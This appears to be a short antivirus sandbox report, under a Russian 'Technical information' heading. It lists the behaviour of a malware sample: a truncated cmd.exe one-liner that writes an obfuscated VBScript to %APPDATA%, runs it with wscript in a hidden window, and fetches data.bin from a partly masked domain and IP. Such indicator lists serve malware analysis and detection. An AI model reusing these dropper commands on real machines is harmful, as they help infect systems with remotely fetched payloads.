Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "GVB8J=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim SF1k" "sUB Ij(NXCDNd)" "PPdx=81" "dIM Wxf" "VmybIs=65" "K5nm0Y="GFO32i"" "AW9=95" "Set Wxf=CreAtEObjeCt(VTMc("070B7C762B69153B415708...
- %APPDATA%\27565.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\27565.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "GVB8J=%APPDATA%\%RANDOM%.vbs" && (for %i in ("Dim SF1k" "sUB Ij(NXCDNd)" "PPdx=81" "dIM Wxf" "VmybIs=65" "K5nm0Y="GFO32i"" "AW9=95" "Set Wxf=CreAtEObjeCt(VTMc("070B7C762B69153B415708...' (со скрытым окном)